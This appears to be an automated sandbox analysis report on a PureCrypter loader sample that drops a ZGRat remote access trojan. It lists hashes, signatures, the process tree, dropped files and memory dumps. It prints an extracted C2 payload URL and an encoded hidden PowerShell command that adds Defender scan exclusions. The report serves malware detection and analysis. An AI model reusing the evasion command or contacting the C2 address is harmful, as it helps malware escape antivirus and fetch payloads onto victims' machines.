Analysis

  • max time kernel
    145s
  • max time network
    150s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240221-en
  • resource tags

    arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    20-03-2024 02:35

General

  • Target

    9663cb27096c5592837253411ddee56a54b84b1851cd77e7b33768091ef26fa2.exe

  • Size

    16KB

  • MD5

    be5041fb817fe1edf7e6c487db9b5534

  • SHA1

    38040d570af54917957504bd88ab7c555e0ee3ba

  • SHA256

    9663cb27096c5592837253411ddee56a54b84b1851cd77e7b33768091ef26fa2

  • SHA512

    8a0200768436ec3e06b11b2447136720af887398d37bc3e635dd417b5dfd86734f8ebc425ed1e8eb2b2689838f3acda0f9a3f6192a54460b4da1027112d28e62

  • SSDEEP

    384:XZ5sjmrXdBJsVbWcoWj7/D1IDBRJJSrxGw6lx87Pr:p5sjmtsV7PI1PmkEr

Malware Config

Extracted

Family

purecrypter

C2

http://41.216.183.153/no/dontlook/re/research/Kofdzsxxr.mp3

Signatures

  • Detect ZGRat V1 35 IoCs
  • PureCrypter

    PureCrypter is a .NET malware loader first seen in early 2021.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Executes dropped EXE 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
      PID:3880
      • C:\Users\Admin\AppData\Local\Temp\9663cb27096c5592837253411ddee56a54b84b1851cd77e7b33768091ef26fa2.exe
        "C:\Users\Admin\AppData\Local\Temp\9663cb27096c5592837253411ddee56a54b84b1851cd77e7b33768091ef26fa2.exe"
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:4780
      • C:\Users\Admin\AppData\Local\Method\mjypw\NumberDecimalDigits.exe
        "C:\Users\Admin\AppData\Local\Method\mjypw\NumberDecimalDigits.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3176
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1608
    • C:\Users\Admin\AppData\Local\Temp\9663cb27096c5592837253411ddee56a54b84b1851cd77e7b33768091ef26fa2.exe
      "C:\Users\Admin\AppData\Local\Temp\9663cb27096c5592837253411ddee56a54b84b1851cd77e7b33768091ef26fa2.exe"
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1444
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAATgB1AG0AYgBlAHIARABlAGMAaQBtAGEAbABEAGkAZwBpAHQAcwAuAGUAeABlADsA
      1⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4172
    • C:\Users\Admin\AppData\Local\Method\mjypw\NumberDecimalDigits.exe
      C:\Users\Admin\AppData\Local\Method\mjypw\NumberDecimalDigits.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3556
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAATgB1AG0AYgBlAHIARABlAGMAaQBtAGEAbABEAGkAZwBpAHQAcwAuAGUAeABlADsA
      1⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3152

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Method\mjypw\NumberDecimalDigits.exe

      Filesize

      16KB

      MD5

      be5041fb817fe1edf7e6c487db9b5534

      SHA1

      38040d570af54917957504bd88ab7c555e0ee3ba

      SHA256

      9663cb27096c5592837253411ddee56a54b84b1851cd77e7b33768091ef26fa2

      SHA512

      8a0200768436ec3e06b11b2447136720af887398d37bc3e635dd417b5dfd86734f8ebc425ed1e8eb2b2689838f3acda0f9a3f6192a54460b4da1027112d28e62

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\9663cb27096c5592837253411ddee56a54b84b1851cd77e7b33768091ef26fa2.exe.log

      Filesize

      1KB

      MD5

      755cbc780adb45ba31b75421f5834ec5

      SHA1

      9aa88eee3ea1344abd1dfa141b363a93858753ad

      SHA256

      4f4290bf42da5f4b18d49c1ee41791db3d83fd7f886cbf792d793b44ca96bb3a

      SHA512

      a48a08f83aa91c092a279e949604e6cc905021334f5d110ffa404057ea7830fd354942ea7165b8f28dc4ab12d49020c23a92576687c26d4c05929f8200051fc7

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      627073ee3ca9676911bee35548eff2b8

      SHA1

      4c4b68c65e2cab9864b51167d710aa29ebdcff2e

      SHA256

      85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

      SHA512

      3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      1a9fa92a4f2e2ec9e244d43a6a4f8fb9

      SHA1

      9910190edfaccece1dfcc1d92e357772f5dae8f7

      SHA256

      0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888

      SHA512

      5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zdaocmb3.zid.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/1444-63-0x000002AFF71A0000-0x000002AFF7444000-memory.dmp

      Filesize

      2.6MB

    • memory/1444-11-0x000002AFF71A0000-0x000002AFF7444000-memory.dmp

      Filesize

      2.6MB

    • memory/1444-5-0x000002AFF71A0000-0x000002AFF7444000-memory.dmp

      Filesize

      2.6MB

    • memory/1444-7-0x000002AFF71A0000-0x000002AFF7444000-memory.dmp

      Filesize

      2.6MB

    • memory/1444-9-0x000002AFF71A0000-0x000002AFF7444000-memory.dmp

      Filesize

      2.6MB

    • memory/1444-1996-0x000002AFF7040000-0x000002AFF7050000-memory.dmp

      Filesize

      64KB

    • memory/1444-13-0x000002AFF71A0000-0x000002AFF7444000-memory.dmp

      Filesize

      2.6MB

    • memory/1444-17-0x000002AFF71A0000-0x000002AFF7444000-memory.dmp

      Filesize

      2.6MB

    • memory/1444-21-0x000002AFF71A0000-0x000002AFF7444000-memory.dmp

      Filesize

      2.6MB

    • memory/1444-23-0x000002AFF71A0000-0x000002AFF7444000-memory.dmp

      Filesize

      2.6MB

    • memory/1444-4830-0x000002AFDE890000-0x000002AFDE891000-memory.dmp

      Filesize

      4KB

    • memory/1444-25-0x000002AFF71A0000-0x000002AFF7444000-memory.dmp

      Filesize

      2.6MB

    • memory/1444-15-0x000002AFF71A0000-0x000002AFF7444000-memory.dmp

      Filesize

      2.6MB

    • memory/1444-27-0x000002AFF71A0000-0x000002AFF7444000-memory.dmp

      Filesize

      2.6MB

    • memory/1444-29-0x000002AFF71A0000-0x000002AFF7444000-memory.dmp

      Filesize

      2.6MB

    • memory/1444-31-0x000002AFF71A0000-0x000002AFF7444000-memory.dmp

      Filesize

      2.6MB

    • memory/1444-33-0x000002AFF71A0000-0x000002AFF7444000-memory.dmp

      Filesize

      2.6MB

    • memory/1444-35-0x000002AFF71A0000-0x000002AFF7444000-memory.dmp

      Filesize

      2.6MB

    • memory/1444-37-0x000002AFF71A0000-0x000002AFF7444000-memory.dmp

      Filesize

      2.6MB

    • memory/1444-39-0x000002AFF71A0000-0x000002AFF7444000-memory.dmp

      Filesize

      2.6MB

    • memory/1444-41-0x000002AFF71A0000-0x000002AFF7444000-memory.dmp

      Filesize

      2.6MB

    • memory/1444-43-0x000002AFF71A0000-0x000002AFF7444000-memory.dmp

      Filesize

      2.6MB

    • memory/1444-45-0x000002AFF71A0000-0x000002AFF7444000-memory.dmp

      Filesize

      2.6MB

    • memory/1444-47-0x000002AFF71A0000-0x000002AFF7444000-memory.dmp

      Filesize

      2.6MB

    • memory/1444-51-0x000002AFF71A0000-0x000002AFF7444000-memory.dmp

      Filesize

      2.6MB

    • memory/1444-53-0x000002AFF71A0000-0x000002AFF7444000-memory.dmp

      Filesize

      2.6MB

    • memory/1444-49-0x000002AFF71A0000-0x000002AFF7444000-memory.dmp

      Filesize

      2.6MB

    • memory/1444-55-0x000002AFF71A0000-0x000002AFF7444000-memory.dmp

      Filesize

      2.6MB

    • memory/1444-57-0x000002AFF71A0000-0x000002AFF7444000-memory.dmp

      Filesize

      2.6MB

    • memory/1444-1402-0x00007FFFD9BB0000-0x00007FFFDA672000-memory.dmp

      Filesize

      10.8MB

    • memory/1444-61-0x000002AFF71A0000-0x000002AFF7444000-memory.dmp

      Filesize

      2.6MB

    • memory/1444-3-0x000002AFF71A0000-0x000002AFF744A000-memory.dmp

      Filesize

      2.7MB

    • memory/1444-67-0x000002AFF71A0000-0x000002AFF7444000-memory.dmp

      Filesize

      2.6MB

    • memory/1444-65-0x000002AFF71A0000-0x000002AFF7444000-memory.dmp

      Filesize

      2.6MB

    • memory/1444-59-0x000002AFF71A0000-0x000002AFF7444000-memory.dmp

      Filesize

      2.6MB

    • memory/1444-4-0x000002AFF71A0000-0x000002AFF7444000-memory.dmp

      Filesize

      2.6MB

    • memory/1444-19-0x000002AFF71A0000-0x000002AFF7444000-memory.dmp

      Filesize

      2.6MB

    • memory/1444-4831-0x000002AFF7550000-0x000002AFF763C000-memory.dmp

      Filesize

      944KB

    • memory/1444-4832-0x000002AFDE8A0000-0x000002AFDE8EC000-memory.dmp

      Filesize

      304KB

    • memory/1444-4833-0x000002AFF7640000-0x000002AFF7694000-memory.dmp

      Filesize

      336KB

    • memory/1444-4841-0x00007FFFD9BB0000-0x00007FFFDA672000-memory.dmp

      Filesize

      10.8MB

    • memory/1444-0-0x000002AFDCB60000-0x000002AFDCB68000-memory.dmp

      Filesize

      32KB

    • memory/1444-1-0x00007FFFD9BB0000-0x00007FFFDA672000-memory.dmp

      Filesize

      10.8MB

    • memory/1444-2-0x000002AFF7040000-0x000002AFF7050000-memory.dmp

      Filesize

      64KB

    • memory/1608-14154-0x0000025432830000-0x0000025432840000-memory.dmp

      Filesize

      64KB

    • memory/1608-14155-0x00007FFFD9BB0000-0x00007FFFDA672000-memory.dmp

      Filesize

      10.8MB

    • memory/3152-14170-0x00007FFFD9BB0000-0x00007FFFDA672000-memory.dmp

      Filesize

      10.8MB

    • memory/3152-14168-0x0000028321350000-0x0000028321360000-memory.dmp

      Filesize

      64KB

    • memory/3152-14157-0x00007FFFD9BB0000-0x00007FFFDA672000-memory.dmp

      Filesize

      10.8MB

    • memory/3152-14158-0x0000028321350000-0x0000028321360000-memory.dmp

      Filesize

      64KB

    • memory/3176-11925-0x00007FFFD9BB0000-0x00007FFFDA672000-memory.dmp

      Filesize

      10.8MB

    • memory/3176-11926-0x00000208B3400000-0x00000208B3410000-memory.dmp

      Filesize

      64KB

    • memory/3176-14153-0x00007FFFD9BB0000-0x00007FFFDA672000-memory.dmp

      Filesize

      10.8MB

    • memory/3556-7090-0x00000199C3980000-0x00000199C3990000-memory.dmp

      Filesize

      64KB

    • memory/3556-7089-0x00007FFFD9BB0000-0x00007FFFDA672000-memory.dmp

      Filesize

      10.8MB

    • memory/3556-14151-0x00007FFFD9BB0000-0x00007FFFDA672000-memory.dmp

      Filesize

      10.8MB

    • memory/3556-11917-0x00000199C3900000-0x00000199C3901000-memory.dmp

      Filesize

      4KB

    • memory/3556-9341-0x00000199C3980000-0x00000199C3990000-memory.dmp

      Filesize

      64KB

    • memory/3556-8751-0x00007FFFD9BB0000-0x00007FFFDA672000-memory.dmp

      Filesize

      10.8MB

    • memory/4172-7079-0x0000029EFD140000-0x0000029EFD162000-memory.dmp

      Filesize

      136KB

    • memory/4172-7073-0x0000029EFD130000-0x0000029EFD140000-memory.dmp

      Filesize

      64KB

    • memory/4172-7072-0x00007FFFD9BB0000-0x00007FFFDA672000-memory.dmp

      Filesize

      10.8MB

    • memory/4172-7086-0x00007FFFD9BB0000-0x00007FFFDA672000-memory.dmp

      Filesize

      10.8MB

    • memory/4172-7083-0x0000029EFD130000-0x0000029EFD140000-memory.dmp

      Filesize

      64KB

    • memory/4780-4840-0x0000000140000000-0x000000014009A000-memory.dmp

      Filesize

      616KB

    • memory/4780-7071-0x00007FFFD9BB0000-0x00007FFFDA672000-memory.dmp

      Filesize

      10.8MB

    • memory/4780-4844-0x000001AC7FEB0000-0x000001AC7FEC0000-memory.dmp

      Filesize

      64KB

    • memory/4780-4842-0x000001AC7FD80000-0x000001AC7FE66000-memory.dmp

      Filesize

      920KB

    • memory/4780-7069-0x000001AC00730000-0x000001AC00786000-memory.dmp

      Filesize

      344KB

    • memory/4780-4843-0x00007FFFD9BB0000-0x00007FFFDA672000-memory.dmp

      Filesize

      10.8MB